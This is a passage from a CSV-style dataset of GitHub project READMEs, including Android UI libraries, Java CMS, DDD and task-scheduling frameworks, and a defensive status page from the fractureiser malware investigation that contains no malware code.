I first used it 12 years back. How is this possible in the incredibly dynamic world where architectures have completely changed? - -### What You will learn - -- You will learn the basics of Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory. -- You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary.... -- You will understand Spring MVC in depth - DispatcherServlet , Model, Controllers and ViewResolver -- You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test -- You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA -- You will learn the basics of Eclipse, Maven, JUnit and Mockito -- You will develop a basic Web application step by step using JSP Servlets and Spring MVC -- You will learn to write unit tests with XML, Java Application Contexts and Mockito - -### Requirements -- You should have working knowledge of Java and Annotations. -- We will help you install Eclipse and get up and running with Maven and Tomcat. - - -### Step Wise Details -Refer each section - -## Installing Tools -- Installation Video : https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 -- GIT Repository For Installation : https://github.com/in28minutes/getting-started-in-5-steps -- PDF : https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf - -## Running Examples -- Download the zip or clone the Git repository. -- Unzip the zip file (if you downloaded one) -- Open Command Prompt and Change directory (cd) to folder containing pom.xml -- Open Eclipse - - File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip - - Select the right project -- Choose the Spring Boot Application file (search for @SpringBootApplication) -- Right Click on the file and Run as Java Application -- You are all Set -- For help : use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 - -### Troubleshooting -- Refer our TroubleShooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ - -## Youtube Playlists - 500+ Videos - -[Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list) - -## Keep Learning in28Minutes - -in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn) - -![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png) -",0 -JeasonWong/Particle,It's a cool animation which can use in splash or somewhere else.,2016-08-29T09:21:15Z,,"## What's Particle ? -It's a cool animation which can use in splash or anywhere else. - -## Demo - -![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif) - -## Article -[手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/) - -## Attributes - -|name|format|description|中文解释 -|:---:|:---:|:---:|:---:| -| pv_host_text | string |set left host text|设置左边主文案 -| pv_host_text_size | dimension |set host text size|设置主文案的大小 -| pv_particle_text | string |set right particle text|设置右边粒子上的文案 -| pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小 -| pv_text_color | color |set host text color|设置左边主文案颜色 -|pv_background_color|color|set background color|设置背景颜色 -| pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间 -| pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间 -|pv_host_text_anim_time|integer|set host text displacement duration|设置左边主文案的位移时间 - -## Usage -#### Define your banner under your xml : - -```xml - -``` - -#### Start animation : - -```java -mParticleView.startAnim(); -``` - -#### Add animation listener to listen the end callback : - -```java -mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() { - @Override - public void onAnimationEnd() { - Toast.makeText(MainActivity.this, ""Animation is End"", Toast.LENGTH_SHORT).show(); - } -}); -``` - -## Import - -Step 1. Add it in your project's build.gradle at the end of repositories: - -```gradle -repositories { - maven { - url 'https://dl.bintray.com/wangyuwei/maven' - } -} -``` - -Step 2. Add the dependency: - -```gradle -dependencies { - compile 'me.wangyuwei:ParticleView:1.0.4' -} -``` - -### About Me - -[Weibo](http://weibo.com/WongYuwei) - -[Blog](http://www.wangyuwei.me) - -### QQ Group 欢迎讨论 - -**479729938** - -##**License** - -```license -Copyright [2016] [JeasonWong of copyright owner] - -Licensed under the Apache License, Version 2.0 (the ""License""); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an ""AS IS"" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -```",0 -rubensousa/GravitySnapHelper,A SnapHelper that snaps a RecyclerView to an edge.,2016-08-31T07:25:23Z,,"# GravitySnapHelper - -A SnapHelper that snaps a RecyclerView to an edge. - -## Setup - -Add this to your build.gradle: - -```groovy -implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2' -``` - -## How to use - -You can either create a GravitySnapHelper, or use GravitySnapRecyclerView. - -If you want to use GravitySnapHelper directly, -you just need to create it and attach it to your RecyclerView: - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.START) -snapHelper.attachToRecyclerView(recyclerView) -``` - -If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation: - -```xml - - - - - - -``` - -Example: - -```xml - -``` - -## Start snapping - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.START) -snapHelper.attachToRecyclerView(recyclerView) -``` - - - -## Center snapping - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.CENTER) -snapHelper.attachToRecyclerView(recyclerView) -``` - - - -## Limiting fling distance - -If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance** -you can change the maximum fling distance allowed. - - - - -## With decoration - - - -## Features - -1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed. -2. **setScrollMsPerInch** - changes the scroll speed. -3. **setGravity** - changes the gravity of the SnapHelper. -4. **setSnapToPadding** - enables snapping to padding (default is false) -5. **smoothScrollToPosition** and **scrollToPosition** -6. RTL support out of the box - -## Nested RecyclerViews - -Take a look at these blog posts if you're using nested RecyclerViews - -1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/) - -2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/) - - -## License - - Copyright 2018 The Android Open Source Project - Copyright 2019 Rúben Sousa - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -xujeff/tianti,java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案,用户可以结合自身业务进行相应扩展,同时提供了针对dao、service等的代码生成工具。技术选型:Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。,2017-02-08T08:21:02Z,,"# 天梯(tianti) - [天梯](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487)[tianti-tool](https://github.com/xujeff/tianti-tool)简介:
- - 1、天梯是一款使用Java编写的免费的轻量级CMS系统,目前提供了从后台管理到前端展现的整体解决方案。 - 2、用户可以不编写一句代码,就制作出一个默认风格的CMS站点。 - 3、前端页面自适应,支持PC和H5端,采用前后端分离的机制实现。后端支持天梯蓝和天梯红换肤功能。 - 4、项目技术分层明显,用户可以根据自己的业务模块进行相应地扩展,很方便二次开发。 - -  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png)
-  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png)
- - 技术架构:
- - 1、技术选型: - 后端 - ·核心框架:Spring Framework 4.2.5.RELEASE - ·安全框架:Apache Shiro 1.3.2 - ·视图框架:Spring MVC 4.2.5.RELEASE - ·数据库连接池:Tomcat JDBC - ·缓存框架:Ehcache - ·ORM框架:Spring Data JPA、hibernate 4.3.5.Final - ·日志管理:SLF4J 1.7.21、Log4j - ·编辑器:ueditor - ·工具类:Apache Commons、Jackson 2.8.5、POI 3.15 - ·view层:JSP - ·数据库:mysql、oracle等关系型数据库 - - 前端 - ·dom : Jquery - ·分页 : jquery.pagination - ·UI管理 : common - ·UI集成 : uiExtend - ·滚动条 : jquery.nicescroll.min.js - ·图表 : highcharts - ·3D图表 :highcharts-more - ·轮播图 : jquery-swipe - ·表单提交 :jquery.form - ·文件上传 :jquery.uploadify - ·表单验证 :jquery.validator - ·展现树 :jquery.ztree - ·html模版引擎 :template - 2、项目结构: - 2.1、tianti-common:系统基础服务抽象,包括entity、dao和service的基础抽象; - 2.2、tianti-org:用户权限模块服务实现; - 2.3、tianti-cms:资讯类模块服务实现; - 2.4、tianti-module-admin:天梯后台web项目实现; - 2.5、tianti-module-interface:天梯接口项目实现; - 2.6、tianti-module-gateway:天梯前端自适应项目实现(是一个静态项目,调用tianti-module-interface获取数据); -   - -  前端项目概览:
- PC:
- ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)   - H5:
- ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)   -
- 后台项目概览:
- 天梯登陆页面: - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)   - 天梯蓝风格(默认): - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)                           - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png) - 天梯红风格: - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)                           - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png) - - -",0 -funkygao/cp-ddd-framework,轻量级DDD正向/逆向业务建模框架,支撑复杂业务系统的架构演化!,2020-09-07T14:03:55Z,,"

DDDplus

- -
- -A lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! - -[![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI) -[![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/) -[![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus) -![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg) -[![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework) -[![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm) -[![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community) - -
- -
- -Languages: English | [中文](README.zh-cn.md) -
- ----- - -## What is DDDplus? - -DDDplus, formerly named cp-ddd-framework(cp means Central Platform:中台), is a lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! - ->It captures DDD missing concepts and patches the building block. It empowers building domain model with forward and reverse modeling. It visualizes the complete domain knowledge from code. It connects frontline developers with (architect, product manager, business stakeholder, management team). It makes (analysis, design, design review, implementation, code review, test) a positive feedback closed-loop. It strengthens building extension oriented flexible software solution. It eliminates frequently encountered misunderstanding of DDD via thorough javadoc for each building block with detailed example. - -In short, the 3 most essential `plus` are: -1. [patch](/dddplus-spec/src/main/java/io/github/dddplus/model) DDD building blocks for pragmatic forward modeling, clearing obstacles of DDD implementation -2. offer a reverse modeling [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), visualizing complete domain knowledge from code -3. provide [extension point](/dddplus-spec/src/main/java/io/github/dddplus/ext) with multiple routing mechanism, suited for complex business scenarios - -## Current status - -Used for several complex critical central platform projects in production environment. - -## Showcase - -[A full demo of DDDplus forward/reverse modeling ->](dddplus-test/src/test/java/ddd/plus/showcase/README.md) - -## Quickstart - -### Forward modeling - -```xml - - io.github.dddplus - dddplus-runtime - -``` - -#### Integration with SpringBoot - -```java -@SpringBootApplication(scanBasePackages = {""${your base packages}"", ""io.github.dddplus""}) -public class Application { - public static void main(String[] args) { - SpringApplication.run(Application.class); - } -} -``` - -### Reverse Modeling - -Please check out the [《step by step guide》](doc/ReverseModelingGuide.md). - -```xml - - io.github.dddplus - dddplus-spec - -``` - -Annotate your code With [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), DDDplus will parse AST and render domain model in multiple views. - -```bash -mvn io.github.dddplus:dddplus-maven-plugin:model \ - -DrootDir=${colon separated source code dirs} \ - -DplantUml=${target business model in svg format} \ - -DtextModel=${target business model in txt format} -``` - -### Architecture Guard - -```bash -mvn io.github.dddplus:dddplus-maven-plugin:enforce \ - -DrootPackage={your pkg} \ - -DrootDir={your src dir} -``` - -## Known Issues - -- reverse modeling assumes unique class names within a code repo - -## Contribution - -You are welcome to contribute to the project with pull requests on GitHub. - -If you find a bug or want to request a feature, please use the [Issue Tracker](https://github.com/funkygao/cp-ddd-framework/issues). - -For any question, you can use [Gitter Chat](https://gitter.im/cp-ddd-framework/community) to ask. - -## Licensing - -DDDplus is licensed under the Apache License, Version 2.0 (the ""License""); you may not use this project except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0). -",0 -fractureiser-investigation/fractureiser,Information about the fractureiser malware,2023-06-07T15:59:56Z,,"

- -

- -**Translations to other languages:** - -*These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.* - -* [简体中文版本见此](./lang/zh-CN/) -* [Polska wersja](./lang/pl-PL/) -* [Читать на русском языке](./lang/ru-RU/) -* [한국어는 이곳으로](./lang/ko-KR/) -* Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls) - -## What? -`fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux. - -If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe. - -We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files. - -## Current Investigation Status -The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months. -A third C&C was never stood up to our knowledge. - -A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant. - -## Follow-Up Meeting -On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale. -See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event. - -## BlanketCon Panel -emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI). - -## What YOU need to know - -### [Modded Players CLICK HERE](docs/users.md) - -If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ. - -Anyone who wishes to dig deeper may also look at -* [Event Timeline](docs/timeline.md) -* [Technical Breakdown](docs/tech.md) - -### I have never used any Minecraft mods -You are not infected. - -## Additional Info - -We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`. - -If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact. - -The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.*** - -**Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing. - ---- - -\- the [fractureiser Mitigation Team](docs/credits.md) -",0 -siaorg/sia-task,微服务任务调度框架,2019-05-15T03:23:47Z,,"## 关于我们 - -* 邮件交流:sia.list@creditease.cn - -* 提交issue: - -* 微信交流: - - - - -微服务任务调度平台 -=== -[使用指南](USERSGUIDE.md)
-[开发指南](DEVELOPGUIDE.md)
-[部署指南](DEPLOY.md)
-[Demo](FASTSTART.md)
- -背景 ---- - -无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。 - -SIA��我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。 - -Introduction ---- - -A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK. - -SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc. - - -项目简介 ---- - -SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。 - -SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。 - -Overview ---- - -SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration. - -SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications. - - - -关键术语 ---- - -* 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口; -* 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位; -* 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期; -* 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求; -* 任务编排中心(Config): 编排中心使用任务来创建计划和作业; -* 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行; -* Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。 - - -Terms ---- - -* Task: the basic execution unit and the HTTP call interface -* Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks -* Plan: the composition of several serial jobs with no execution cycle -* Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks -* Config: creates plans and jobs with tasks -* Executer: receives HTTP requests and executes the business logic -* Hunter: fetches tasks, uploads metadata and scripts business tasks - - -微服务任务调度平台的特性 ---- - -* 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务; -* 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。 -* 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。 -* 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。 - -Features ---- - -* Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. @OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage. -* Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive. -* Self-adaptive task scheduling. Tasks can be woken up based on the custom strategies when execution failure happens. -* Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedules and configures jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently. - - - - -微服务任务调度平台设计 ---- - -SIA-TASK主要分为五个部分: - -* 任务执行器 -* 任务调度中心 -* 任务编排中心 -* 任务注册中心(zookeeper) -* 持久存储(Mysql) - -SIA-TASK includes the following components: - -* Executer -* Scheduler -* Config -* Registry (Zookeeper) -* Persistent storage (MySQL) - -![逻辑架构图](docs/images/sia_task1.png) - - -SIA-TASK的主要运行逻辑: - -1. 通过注解抓取任务执行器中的任务上报到任务注册中心 -2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储 -3. 任务调度中心从持久化存储获取调度信息 -4. 任务调度中心按照调度逻辑访问任务执行器 - -SIA-TASK的主要运行逻辑: - -1. Fetch and upload annotated tasks to the registry -2. The Config obtains data from the registry for scheduling and persistent storage -3. The Scheduler acquires data from the persistent storage -4. The Scheduler accesses the task scheduler following the scheduling logic - - -![逻辑架构图](docs/images/sia_task2.png) - - -UI预览 ---- - -首页提供多维度监控 - -* 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。 -* 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。 -* 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。 - -Homepage - -* Scheduler: loading capacity, alarm value and job distribution -* Scheduling: scheduling frequency, job metrics and task metrics -* Active users: job count and task count of active users - -![首页](docs/images/index.png) - -
-调度监控提供对已提交的作业进行实时监控展示 - -* 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。 -* 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。 - -Scheduling Monitor: real-time monitoring over submitted jobs - -* Real-time job monitoring: runtime metrics of jobs by project group -* Real-time log correlation: 可以通过涂色状态图标进行日志实时关联展示。 - - -![调度监控](docs/images/scheduling-monitoring.png) - -
-任务管理:提供任务元数据的相关操作 - -* 任务元数据录入:手动模式的任务,可在此进行录入。 -* 任务连通性测试:提供任务连通性功能测试。 -* 任务元数据其他操作:修改,删除。 - -Task Manager: task metadata operation - -* Metadata entry: enter the metadata of manual tasks -* Connectivity test: test the connectivity of tasks -* Modification and deletion - - -![Task管理](docs/images/Task-management.png) -![Task管理](docs/images/user-handbook_taskMg5.png) - - -
-Job管理:提供作业相关操作 - -* 任务编排:进行作业的编排。 -* 发布作业: 作业的创建,修改,以及发布。 -* 级联设置:提供存在时间依赖的作业设置。 - -Job Manager: job operations - -* Task configuration: configure jobs -* Job release: create, modify and release jobs -* Cascading setting: set time-dependent jobs - - -![Job管理](docs/images/Job-management.png) - -
-日志管理 - -Log Manager - -![Job管理](docs/images/user-handbook_log1.png) - - -开源地址 ---- - -* [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task) - -## 其他说明 - -### 关于编译代码 -* 建议使用Jdk1.8以上,JDK 1.8 or later version is recommended. - -### 版本说明 -* 建议版本1.0.0,SIA-TASK 1.0.0 is recommended. - -### 版权说明 -* 自身使用 Apache v2.0 协议,SIA-TASK uses Apache 2.0. - -### 其他相关资料 - -## SIA相关开源产品链接: - -+ [微服务路由网关](https://github.com/siaorg/sia-gateway) - -+ [Rabbitmq队列服务PLUS](https://github.com/siaorg/sia-rabbitmq-plus) - - -(待补充) - - - -",0 -heysupratim/material-daterange-picker,A material Date Range Picker based on wdullaers MaterialDateTimePicker,2015-09-14T12:00:47Z,,"[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501) - -[ ![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg) ](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion) - -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library) - - -Material Date and Time Picker with Range Selection -====================================================== - - -Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker - -## Adding to your project - -Add the jcenter repository information in your build.gradle file like this -```java - -repositories { - jcenter() -} - - -dependencies { - implementation 'com.borax12.materialdaterangepicker:library:2.0' -} - -``` -Beginning Version 2.0 now also available on Maven Central - - -## Date Selection - -![FROM](/screenshots/2.png?raw=true) -![TO](/screenshots/1.png?raw=true) - -## Time Selection - -![FROM](/screenshots/3.png?raw=true) -![TO](/screenshots/4.png?raw=true) - -Support for Android 4.0 and up. - -From the original library documentation - - -You may also add the library as an Android Library to your project. All the library files live in ```library```. - -Using the Pickers --------------------------------- - -1. Implement an `OnDateSetListener` or `OnTimeSetListener` -2. Create a ``DatePickerDialog` using the supplied factory - -### Implement an `OnDateSetListener` -In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers. - -or -### Implement an `OnTimeSetListener` -In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers. - -```java - -//new onDateSet -@Override -public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) { - -} - -@Override -public void onTimeSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) { - String hourString = hourOfDay < 10 ? ""0""+hourOfDay : """"+hourOfDay; - String minuteString = minute < 10 ? ""0""+minute : """"+minute; - String hourStringEnd = hourOfDayEnd < 10 ? ""0""+hourOfDayEnd : """"+hourOfDayEnd; - String minuteStringEnd = minuteEnd < 10 ? ""0""+minuteEnd : """"+minuteEnd; - String time = ""You picked the following time: From - ""+hourString+""h""+minuteString+"" To - ""+hourStringEnd+""h""+minuteStringEnd; - - timeTextView.setText(time); - -} -``` - -### Create a DatePickerDialog` using the supplied factory -You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`. - -```java -Calendar now = Calendar.getInstance(); -DatePickerDialog dpd = DatePickerDialog.newInstance( - MainActivity.this, - now.get(Calendar.YEAR), - now.get(Calendar.MONTH), - now.get(Calendar.DAY_OF_MONTH) -); -dpd.show(getFragmentManager(), ""Datepickerdialog""); -``` - -### Create a TimePickerDialog` using the supplied factory -You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`. -```java -Calendar now = Calendar.getInstance(); -TimePickerDialog tpd = TimePickerDialog.newInstance( - MainActivity.this, - now.get(Calendar.HOUR_OF_DAY), - 